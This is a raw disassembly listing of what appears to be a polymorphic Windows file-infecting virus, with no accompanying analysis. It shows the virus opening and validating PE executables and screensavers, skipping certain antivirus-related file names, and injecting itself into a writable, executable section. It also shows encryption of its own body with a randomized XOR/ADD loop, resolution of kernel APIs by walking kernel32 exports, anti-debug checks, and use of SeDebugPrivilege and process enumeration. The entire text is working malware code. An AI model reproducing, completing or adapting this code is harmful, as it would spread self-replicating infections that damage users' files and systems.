push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_480877
mov [ebp+1042B4h], eax
locret_48032A: ; CODE XREF: sub_480259+10�j
; sub_480259+27�j ...
retn
sub_480259 endp
; ---------------------------------------------------------------------------
loc_48032B: ; CODE XREF: sub_48045B+188�p
; sub_48045B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_480370 proc near ; CODE XREF: sub_48045B:loc_4804D0�p
; sub_48045B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_480375: ; CODE XREF: sub_480370+23�j
jecxz short locret_4803AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_4803AC
cmp dword ptr [edx+0Ch], 1
jb short loc_480375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_4803AC: ; CODE XREF: sub_480370:loc_480375�j
; sub_480370+1D�j ...
retn
sub_480370 endp
; =============== S U B R O U T I N E =======================================
sub_4803AD proc near ; CODE XREF: fuck:00480445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_4803AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4803BA: ; CODE XREF: fuck:004803DB�j
mov ecx, edi
jmp short loc_4803C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_4803C5: ; CODE XREF: fuck:004803D7�j
mov ebx, edi
xor ecx, ecx
loc_4803C9: ; CODE XREF: fuck:004803BC�j
; fuck:004803DF�j
lodsb
cmp al, 61h
jb short loc_4803D4
cmp al, 7Ah
ja short loc_4803D4
sub al, 20h
loc_4803D4: ; CODE XREF: fuck:004803CC�j
; fuck:004803D0�j
stosb
cmp al, 5Ch
jz short loc_4803C5
cmp al, 2Eh
jz short loc_4803BA
cmp al, 0
jnz short loc_4803C9
jecxz short locret_4803AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_4803F7
cmp eax, 524353h
jnz locret_48032A
loc_4803F7: ; CODE XREF: fuck:004803EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_48032A
cmp eax, 4E554357h
jz locret_48032A
cmp eax, 32334357h
jz locret_48032A
cmp eax, 4F545350h
jz locret_48032A
xor ebx, ebx
call sub_480259
jnz short loc_48043E
call sub_48012D
call sub_480259
jz locret_48032A
loc_48043E: ; CODE XREF: fuck:0048042C�j
xor edx, edx
call sub_48045B
call sub_4803AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_480855
; =============== S U B R O U T I N E =======================================
sub_48045B proc near ; CODE XREF: fuck:00480440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_480855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_480855
test dword ptr [ebx+16h], 2000h
jnz loc_480855
test byte ptr [ebx+5Ch], 2
jz loc_480855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_480855
cmp eax, 20202020h
jz loc_480855
mov ecx, [ebx+0C8h]
jecxz short loc_4804D0
push ecx
call sub_47F414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_4804D0: ; CODE XREF: sub_48045B+5D�j
call sub_480370
jb loc_480855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_4804F0
xor eax, eax
jmp short loc_4804F5
; ---------------------------------------------------------------------------
loc_4804F0: ; CODE XREF: sub_48045B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_4804F5: ; CODE XREF: sub_48045B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_47EB50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_480517: ; CODE XREF: sub_48045B+D5�j
push 20h
dec cl
pop eax
js short loc_480532
call near ptr dword_47EB50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_480517
; ---------------------------------------------------------------------------
loc_480532: ; CODE XREF: sub_48045B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_480560
test dword ptr [ebp+1039C0h], 3
jnz short loc_480556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_480560
; ---------------------------------------------------------------------------
loc_480556: ; CODE XREF: sub_48045B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_480560: ; CODE XREF: sub_48045B+E1�j
; sub_48045B+F9�j ...
push 6
pop ecx
loc_480566: ; CODE XREF: sub_48045B+129�j
push 6
pop eax
call near ptr dword_47EB50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_480566
test dword ptr [ebp+1039C0h], 8
jnz short loc_48059B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_480560
loc_48059B: ; CODE XREF: sub_48045B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_4805C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_480560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_480560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_480560
loc_4805C2: ; CODE XREF: sub_48045B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_4805D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_480560
loc_4805D7: ; CODE XREF: sub_48045B+171�j
and dword ptr [ebp+104300h], 0
call loc_47F855
call loc_48032B
call sub_48085E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_480259
jz loc_480855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_480370
jb loc_480855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_48064B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_48064B: ; CODE XREF: sub_48045B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_48065F
rep movsb
loc_48065F: ; CODE XREF: sub_48045B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_48071D
push dword ptr [ebx+28h]
call sub_47F414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_48071D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_48069C
xor ecx, ecx
loc_48069C: ; CODE XREF: sub_48045B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_480703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_4806DC
neg dword ptr [eax]
loc_4806DC: ; CODE XREF: sub_48045B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_4806FA
neg dword ptr [eax]
loc_4806FA: ; CODE XREF: sub_48045B+29B�j
push ecx
call loc_48032B
pop ecx
jmp short loc_48070F
; ---------------------------------------------------------------------------
loc_480703: ; CODE XREF: sub_48045B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_48070F: ; CODE XREF: sub_48045B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_48071D: ; CODE XREF: sub_48045B+20E�j
; sub_48045B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_480736
imul edx, 12345678h
loc_480736: ; CODE XREF: sub_48045B+2D3�j
mov [eax-19h], dx
call sub_47E120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_480768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_480768: ; CODE XREF: sub_48045B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_480784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_480784: ; CODE XREF: sub_48045B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_480797
push edx
call sub_47FEF1
pop edx
loc_480797: ; CODE XREF: sub_48045B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_4807A4
mov [ebx+28h], ecx
jmp short loc_4807B1
; ---------------------------------------------------------------------------
loc_4807A4: ; CODE XREF: sub_48045B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_4807AE
jmp short loc_4807B1
; ---------------------------------------------------------------------------
loc_4807AE: ; CODE XREF: sub_48045B+34F�j
mov ecx, [ebx+28h]
loc_4807B1: ; CODE XREF: sub_48045B+347�j
; sub_48045B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_4807D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_4807D1: ; CODE XREF: sub_48045B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_4807E2
mov [edx+8], ecx
loc_4807E2: ; CODE XREF: sub_48045B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_480813
add ecx, [ebp+101069h]
loc_480813: ; CODE XREF: sub_48045B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_480835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_480835
mov dh, [ebp+1039BFh]
loc_480835: ; CODE XREF: sub_48045B+3C4�j
; sub_48045B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_48084C
loc_480841: ; CODE XREF: sub_48045B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_480841
jmp short loc_480855
; ---------------------------------------------------------------------------
loc_48084C: ; CODE XREF: sub_48045B+3E4�j
; sub_48045B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_48084C
loc_480855: ; CODE XREF: fuck:00480456�j
; sub_48045B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_48045B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48085E proc near ; CODE XREF: sub_48045B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_48032A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_480877: ; CODE XREF: sub_480259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_48089F: ; CODE XREF: sub_480259+6B�j
; sub_480259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_4808AB: ; CODE XREF: sub_480259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_48085E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 5070203h, 65F50106h
dd 0B1A74486h, 0FFE7B9E8h, 0FF8B80FFh, 56FB9h, 43DB2100h
dd 0DC0A4B40h, 0AC05DB21h, 900004Fh, 432445DDh, 0DD1BE432h
dd 45E2D47h, 0ED3B0000h, 58F0Fh, 0B2050000h, 2A000023h
dd 84344BE3h, 4F972443h, 4853DD0Bh, 1D4F4F58h, 4CCCh, 0BEED2340h
dd 47C085h, 4043DB21h, 21DC0A4Bh, 4FAC05DBh, 0DD090000h
dd 32432445h, 47DD1BE4h, 45E2Dh, 0FED3B00h, 58Fh, 23B20500h
dd 0E32A0000h, 4384344Bh, 0B4F9724h, 584853DDh, 0CC1D4F4Fh
dd 4000004Ch, 0E8ED23h, 5A000000h, 2104C283h, 4B4043DBh
dd 0DB21DC0Ah, 4FAC05h, 45DD0900h, 0E4324324h, 2D47DD1Bh
dd 45Eh, 8F0FED3Bh, 5, 23B205h, 4BE32A00h, 24438434h, 0DD0B4F97h
dd 4F584853h, 4CCC1D4Fh, 23400000h, 0FC985EDh, 15184h
dd 43DB2100h, 0DC0A4B40h, 0EBh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 126h dup(0)
dd offset loc_47E000
dd 133Dh dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_48604D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_486041
mov ebx, [eax+29C1h]
jmp short loc_48604B
; ---------------------------------------------------------------------------
loc_486041: ; CODE XREF: fuck:00486037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_48604B: ; CODE XREF: fuck:0048603F�j
mov ebx, [ebx]
loc_48604D: ; CODE XREF: fuck:0048601F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 9A11h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0DAh
rep movsb
sldt cx
test ecx, ecx
jnz short loc_48607B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_48607B: ; CODE XREF: fuck:00486074�j
and ebx, 0FFFFF000h
loc_486081: ; CODE XREF: fuck:00486090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_486092
loc_48608A: ; CODE XREF: fuck:0048609F�j
sub ebx, 100h
jnz short loc_486081
loc_486092: ; CODE XREF: fuck:00486088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_48608A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_4860AC: ; CODE XREF: fuck:loc_4860C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_4860C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_4860C5
loc_4860C0: ; CODE XREF: fuck:004860B5�j
loop loc_4860AC
pop ecx
jmp short loc_4860F0
; ---------------------------------------------------------------------------
loc_4860C5: ; CODE XREF: fuck:004860BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_486137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48617E
loc_4860F0: ; CODE XREF: fuck:004860C3�j
; sub_48617E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_48611C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_48611C: ; CODE XREF: sub_48617E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_48617E
; ---------------------------------------------------------------------------
test al, 6Ch
; =============== S U B R O U T I N E =======================================
sub_486120 proc near ; CODE XREF: sub_48845B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_486128: ; CODE XREF: sub_486120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_486128
pop ebx
retn
sub_486120 endp
; ---------------------------------------------------------------------------
loc_486137: ; CODE XREF: fuck:004860EE�j
call near ptr loc_486146+2
inc ebx
insb
outsd
jnb short near ptr loc_4861A3+3
dec eax
popa
outsb
db 64h
insb
loc_486146: ; CODE XREF: fuck:loc_486137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_486162+1
inc ebx
jb short loc_4861BE
popa
jz short near ptr loc_4861C0+1
inc ebp
jbe short near ptr loc_4861C0+4
outsb
jz short loc_4861A3
loc_486162: ; CODE XREF: fuck:00486151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_48617E
inc edi
db 65h
jz short near ptr loc_4861C0+1
popa
jnb short near ptr loc_4861EA+2
inc ebp
jb short near ptr loc_4861EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_48617E proc near ; CODE XREF: fuck:0048616C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004860F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00486534 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_48655F
test eax, eax
jz loc_4860F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_486534
loc_4861A3: ; CODE XREF: fuck:00486160�j
; fuck:0048613F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_4861C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_4861BE: ; CODE XREF: fuck:00486157�j
jmp short loc_4861C7
; ---------------------------------------------------------------------------
loc_4861C0: ; CODE XREF: sub_48617E+2C�j
; fuck:0048615A�j ...
and dword ptr [ebp+101598h], 0
loc_4861C7: ; CODE XREF: sub_48617E:loc_4861BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_4861EA: ; CODE XREF: fuck:00486176�j
; fuck:00486179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_48659C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_4862E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_486534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_486534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_486534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_4862D3
jmp loc_486534
; ---------------------------------------------------------------------------
loc_4862D3: ; CODE XREF: sub_48617E+14B�p
; sub_48617E+162�j
push 0
pop ecx
jecxz short locret_4862E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_4862D3
; ---------------------------------------------------------------------------
locret_4862E2: ; CODE XREF: sub_48617E+158�j
retn
; ---------------------------------------------------------------------------
loc_4862E3: ; CODE XREF: sub_48617E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_486534
call near ptr loc_4862FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_4862FA: ; CODE XREF: sub_48617E+172�p
add bh, bh
sub_48617E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_48659C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_486534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_486534
mov ecx, [ebp+103F06h]
jecxz short loc_486383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_486383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_486383: ; CODE XREF: fuck:00486367�j
; fuck:00486378�j
call sub_486540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_4863CC: ; CODE XREF: fuck:004863D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_4863CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_486534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48617E
loc_486534: ; CODE XREF: sub_48617E+1F�j
; sub_48617E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_4860F0
; END OF FUNCTION CHUNK FOR sub_48617E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_486540 proc near ; CODE XREF: fuck:loc_486383�p
; sub_48655F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_486540 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_48655F proc near ; CODE XREF: sub_48617E+9�p
xor ecx, ecx
call sub_486540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_48655F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 1, 2 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_48659C proc near ; CODE XREF: sub_48617E+7C�p
; fuck:00486312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_4865A7: ; CODE XREF: sub_48659C+E�j
lodsb
test al, al
jnz short loc_4865A7
loop sub_48659C
retn
sub_48659C endp
; =============== S U B R O U T I N E =======================================
sub_4865AF proc near ; CODE XREF: sub_48812D+25�p
; FUNCTION CHUNK AT 00486639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 00486A09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_4865DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_486639
jbe short near ptr loc_486639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_486640
inc ecx
loc_4865DC: ; CODE XREF: sub_4865AF+13�p
add [eax-1], dl
sub_4865AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4865AF
loc_486639: ; CODE XREF: sub_4865AF+1F�j
; sub_4865AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_4866A3+2
loc_486640: ; CODE XREF: sub_4865AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_4866AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_4866B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_4866C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_4866E1+1
push 4500746Fh
js short loc_4866DF
jz short near ptr loc_4866CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_486700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_4866E3+6
loc_4866A3: ; CODE XREF: sub_4865AF+8F�j
imul ebp, [ebp+41h], 69727474h
